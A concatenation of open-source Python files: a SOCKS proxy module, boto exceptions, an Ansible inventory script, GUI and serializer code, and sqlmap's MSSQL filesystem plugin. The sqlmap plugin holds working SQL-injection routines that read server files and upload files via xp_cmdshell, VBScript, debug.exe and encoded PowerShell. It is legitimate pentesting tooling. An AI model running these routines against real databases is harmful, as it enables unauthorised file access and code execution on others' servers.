proxytype - The type of the proxy to be used. Three types
are supported: PROXY_TYPE_SOCKS4 (including socks4a),
PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
addr - The address of the server (IP or DNS).
port - The port of the server. Defaults to 1080 for SOCKS
servers and 8080 for HTTP proxy servers.
rdns - Should DNS queries be preformed on the remote side
(rather than the local side). The default is True.
Note: This has no effect with SOCKS4 servers.
username - Username to authenticate with to the server.
The default is no authentication.
password - Password to authenticate with to the server.
Only relevant when username is also provided.
"""
self.__proxy = (proxytype, addr, port, rdns, username, password)
def __negotiatesocks5(self, destaddr, destport):
"""__negotiatesocks5(self,destaddr,destport)
Negotiates a connection through a SOCKS5 server.
"""
# First we'll send the authentication packages we support.
if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
# The username/password details were supplied to the
# setproxy method so we support the USERNAME/PASSWORD
# authentication (in addition to the standard none).
self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))
else:
# No username/password were entered, therefore we
# only support connections with no authentication.
self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))
# We'll receive the server's response to determine which
# method was selected
chosenauth = self.__recvall(2)
if chosenauth[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
# Check the chosen authentication method
if chosenauth[1:2] == chr(0x00).encode():
# No authentication is required
pass
elif chosenauth[1:2] == chr(0x02).encode():
# Okay, we need to perform a basic username/password
# authentication.
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])
authstat = self.__recvall(2)
if authstat[0:1] != chr(0x01).encode():
# Bad response
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if authstat[1:2] != chr(0x00).encode():
# Authentication failed
self.close()
raise Socks5AuthError((3, _socks5autherrors[3]))
# Authentication succeeded
else:
# Reaching here is always bad
self.close()
if chosenauth[1] == chr(0xFF).encode():
raise Socks5AuthError((2, _socks5autherrors[2]))
else:
raise GeneralProxyError((1, _generalerrors[1]))
# Now we can request the actual connection
req = struct.pack('BBB', 0x05, 0x01, 0x00)
# If the given destination address is an IP address, we'll
# use the IPv4 address request even if remote resolving was specified.
try:
ipaddr = socket.inet_aton(destaddr)
req = req + chr(0x01).encode() + ipaddr
except socket.error:
# Well it's not an IP number, so it's probably a DNS name.
if self.__proxy[3]:
# Resolve remotely
ipaddr = None
req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr
else:
# Resolve locally
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
req = req + chr(0x01).encode() + ipaddr
req = req + struct.pack(">H", destport)
self.sendall(req)
# Get the response
resp = self.__recvall(4)
if resp[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
elif resp[1:2] != chr(0x00).encode():
# Connection failed
self.close()
if ord(resp[1:2])<=8:
raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])]))
else:
raise Socks5Error((9, _socks5errors[9]))
# Get the bound address/port
elif resp[3:4] == chr(0x01).encode():
boundaddr = self.__recvall(4)
elif resp[3:4] == chr(0x03).encode():
resp = resp + self.recv(1)
boundaddr = self.__recvall(ord(resp[4:5]))
else:
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
boundport = struct.unpack(">H", self.__recvall(2))[0]
self.__proxysockname = (boundaddr, boundport)
if ipaddr != None:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def getproxysockname(self):
"""getsockname() -> address info
Returns the bound IP address and port number at the proxy.
"""
return self.__proxysockname
def getproxypeername(self):
"""getproxypeername() -> address info
Returns the IP and port number of the proxy.
"""
return _orgsocket.getpeername(self)
def getpeername(self):
"""getpeername() -> address info
Returns the IP address and port number of the destination
machine (note: getproxypeername returns the proxy)
"""
return self.__proxypeername
def __negotiatesocks4(self,destaddr,destport):
"""__negotiatesocks4(self,destaddr,destport)
Negotiates a connection through a SOCKS4 server.
"""
# Check if the destination address provided is an IP address
rmtrslv = False
try:
ipaddr = socket.inet_aton(destaddr)
except socket.error:
# It's a DNS name. Check where it should be resolved.
if self.__proxy[3]:
ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01)
rmtrslv = True
else:
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
# Construct the request packet
req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr
# The username parameter is considered userid for SOCKS4
if self.__proxy[4] != None:
req = req + self.__proxy[4]
req = req + chr(0x00).encode()
# DNS name if remote resolving is required
# NOTE: This is actually an extension to the SOCKS4 protocol
# called SOCKS4A and may not be supported in all cases.
if rmtrslv:
req = req + destaddr + chr(0x00).encode()
self.sendall(req)
# Get the response from the server
resp = self.__recvall(8)
if resp[0:1] != chr(0x00).encode():
# Bad data
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
if resp[1:2] != chr(0x5A).encode():
# Server returned an error
self.close()
if ord(resp[1:2]) in (91, 92, 93):
self.close()
raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))
else:
raise Socks4Error((94, _socks4errors[4]))
# Get the bound address/port
self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0])
if rmtrslv != None:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def __negotiatehttp(self, destaddr, destport):
"""__negotiatehttp(self,destaddr,destport)
Negotiates a connection through an HTTP server.
"""
# If we need to resolve locally, we do this now
if not self.__proxy[3]:
addr = socket.gethostbyname(destaddr)
else:
addr = destaddr
self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode())
# We read the response until we get the string "\r\n\r\n"
resp = self.recv(1)
while resp.find("\r\n\r\n".encode()) == -1:
resp = resp + self.recv(1)
# We just need the first line to check if the connection
# was successful
statusline = resp.splitlines()[0].split(" ".encode(), 2)
if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()):
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
try:
statuscode = int(statusline[1])
except ValueError:
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if statuscode != 200:
self.close()
raise HTTPError((statuscode, statusline[2]))
self.__proxysockname = ("0.0.0.0", 0)
self.__proxypeername = (addr, destport)
def connect(self, destpair):
"""connect(self, despair)
Connects to the specified destination through a proxy.
destpar - A tuple of the IP/DNS address and the port number.
(identical to socket's connect).
To select the proxy server use setproxy().
"""
# Do a minimal input check first
if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int):
raise GeneralProxyError((5, _generalerrors[5]))
if self.__proxy[0] == PROXY_TYPE_SOCKS5:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self, (self.__proxy[1], portnum))
self.__negotiatesocks5(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatesocks4(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_HTTP:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 8080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatehttp(destpair[0], destpair[1])
elif self.__proxy[0] == None:
_orgsocket.connect(self, (destpair[0], destpair[1]))
else:
raise GeneralProxyError((4, _generalerrors[4]))
| gpl-3.0 |
zachmullen/boto | boto/configservice/exceptions.py | 135 | 2528 | # Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.exception import BotoServerError
class InvalidLimitException(BotoServerError):
pass
class NoSuchBucketException(BotoServerError):
pass
class InvalidSNSTopicARNException(BotoServerError):
pass
class ResourceNotDiscoveredException(BotoServerError):
pass
class MaxNumberOfDeliveryChannelsExceededException(BotoServerError):
pass
class LastDeliveryChannelDeleteFailedException(BotoServerError):
pass
class InsufficientDeliveryPolicyException(BotoServerError):
pass
class InvalidRoleException(BotoServerError):
pass
class InvalidTimeRangeException(BotoServerError):
pass
class NoSuchDeliveryChannelException(BotoServerError):
pass
class NoSuchConfigurationRecorderException(BotoServerError):
pass
class InvalidS3KeyPrefixException(BotoServerError):
pass
class InvalidDeliveryChannelNameException(BotoServerError):
pass
class NoRunningConfigurationRecorderException(BotoServerError):
pass
class ValidationException(BotoServerError):
pass
class NoAvailableConfigurationRecorderException(BotoServerError):
pass
class InvalidNextTokenException(BotoServerError):
pass
class InvalidConfigurationRecorderNameException(BotoServerError):
pass
class NoAvailableDeliveryChannelException(BotoServerError):
pass
class MaxNumberOfConfigurationRecordersExceededException(BotoServerError):
pass
| mit |
sanghinitin/golismero | tools/sqlmap/plugins/dbms/mssqlserver/filesystem.py | 8 | 14284 | #!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s', please wait.." % dFile
logger.info(infoMsg)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = hexencode(wFileContent)
# TODO: need to be fixed
psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile)
psString = psString.encode('utf-16le')
psString = psString.encode("base64")[:-1].replace("\n", "")
logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("converting the file utilizing PowerShell EncodedCommand")
commands = ("cd %s" % tmpPath,
"powershell -EncodedCommand %s" % psString,
"del /F /Q %s" % randFilePath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "")
encodedFileContent = wFileContent.encode("base64")[:-1]
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "another technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
#self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
| gpl-2.0 |
nuagenetworks/vspk-python | vspk/v6/fetchers/nuipfilterprofiles_fetcher.py | 2 | 2156 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUIPFilterProfilesFetcher(NURESTFetcher):
""" Represents a NUIPFilterProfiles fetcher
Notes:
This fetcher enables to fetch NUIPFilterProfile objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUIPFilterProfile class that is managed.
Returns:
.NUIPFilterProfile: the managed class
"""
from .. import NUIPFilterProfile
return NUIPFilterProfile
| bsd-3-clause |
bols-blue/ansible | plugins/inventory/jail.py | 132 | 1288 | #!/usr/bin/env python
# (c) 2013, Michael Scherer <[email protected]>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from subprocess import Popen,PIPE
import sys
import json
result = {}
result['all'] = {}
pipe = Popen(['jls', '-q', 'name'], stdout=PIPE, universal_newlines=True)
result['all']['hosts'] = [x[:-1] for x in pipe.stdout.readlines()]
result['all']['vars'] = {}
result['all']['vars']['ansible_connection'] = 'jail'
if len(sys.argv) == 2 and sys.argv[1] == '--list':
print json.dumps(result)
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print json.dumps({'ansible_connection': 'jail'})
else:
print "Need an argument, either --list or --host <host>"
| gpl-3.0 |
maikodaraine/EnlightenmentUbuntu | bindings/python/python-efl/examples/elementary/test_segment_control.py | 1 | 2798 | #!/usr/bin/env python
# encoding: utf-8
import os
from efl.evas import EVAS_HINT_EXPAND, EVAS_HINT_FILL
from efl import elementary
from efl.elementary.window import StandardWindow
from efl.elementary.box import Box
from efl.elementary.icon import Icon
from efl.elementary.segment_control import SegmentControl
EXPAND_BOTH = EVAS_HINT_EXPAND, EVAS_HINT_EXPAND
EXPAND_HORIZ = EVAS_HINT_EXPAND, 0.0
FILL_BOTH = EVAS_HINT_FILL, EVAS_HINT_FILL
FILL_HORIZ = EVAS_HINT_FILL, 0.5
script_path = os.path.dirname(os.path.abspath(__file__))
img_path = os.path.join(script_path, "images")
def cb_seg_changed(seg, item):
print(seg)
print(item)
def segment_control_clicked(obj):
win = StandardWindow("segment-control", "Segment Control test",
autodel=True, size=(320, 280))
if obj is None:
win.callback_delete_request_add(lambda o: elementary.exit())
vbox = Box(win, size_hint_weight=EXPAND_BOTH, size_hint_align=FILL_BOTH)
win.resize_object_add(vbox)
vbox.show()
# segment 1
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "Only Text")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic)
ic = Icon(win)
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic, "Text + Icon")
seg.item_add(None, "Seg4")
seg.item_add(None, "Seg5")
seg.callback_changed_add(cb_seg_changed)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 2
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "SegmentItem")
it = seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 3
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=(0.5, 0.5))
for i in range(3):
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
if i == 1:
it = seg.item_add(ic)
else:
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 4
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ, disabled=True)
seg.item_add(None, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
win.show()
if __name__ == "__main__":
elementary.init()
segment_control_clicked(None)
elementary.run()
elementary.shutdown()
| unlicense |
AlexanderKaluzhny/instanotifier | instanotifier/notification/serializers.py | 1 | 1953 | from copy import deepcopy
import hashlib
from bs4 import BeautifulSoup
from rest_framework import serializers
from instanotifier.notification.models import RssNotification
from instanotifier.notification.utils import html
def _parse_country(summary):
soup = BeautifulSoup(summary, features="html5lib")
country_tag = soup.find(text="Country")
if country_tag:
country = country_tag.find_next(string=True).strip(': \n')
return country
return "Unknown"
def _compute_entry_id_hash(entry_id):
return hashlib.md5(entry_id.encode("utf-8")).hexdigest()
class RssNotificationCreateSerializer(serializers.ModelSerializer):
"""
Creates the RssNotification from the data provided by Feed parser.
Evaluates the necessary fields deriving it from the data.
"""
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
def to_internal_value(self, data):
new_data = deepcopy(data)
new_data['entry_id'] = data['id']
new_data['country'] = 'TBD' # it is a derived field, we will set it based on "summary" field
new_data['internal_id'] = 'TBD' # it is a derived field, we will set it based on "entry_id" field
new_data = super().to_internal_value(new_data)
return new_data
def validate_summary(self, value):
summary = html.clean_html(value)
return summary
def validate(self, validated_data):
summary = validated_data["summary"]
validated_data["country"] = _parse_country(summary)
validated_data["internal_id"] = _compute_entry_id_hash(validated_data["entry_id"])
return validated_data
class RssNotificationUpdateSerializer(serializers.ModelSerializer):
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
| mit |
stgraber/snapcraft | integration_tests/test_make_plugin.py | 6 | 2306 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import (
DirExists,
Not
)
import integration_tests
class MakePluginTestCase(integration_tests.TestCase):
def test_stage_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('stage', project_dir)
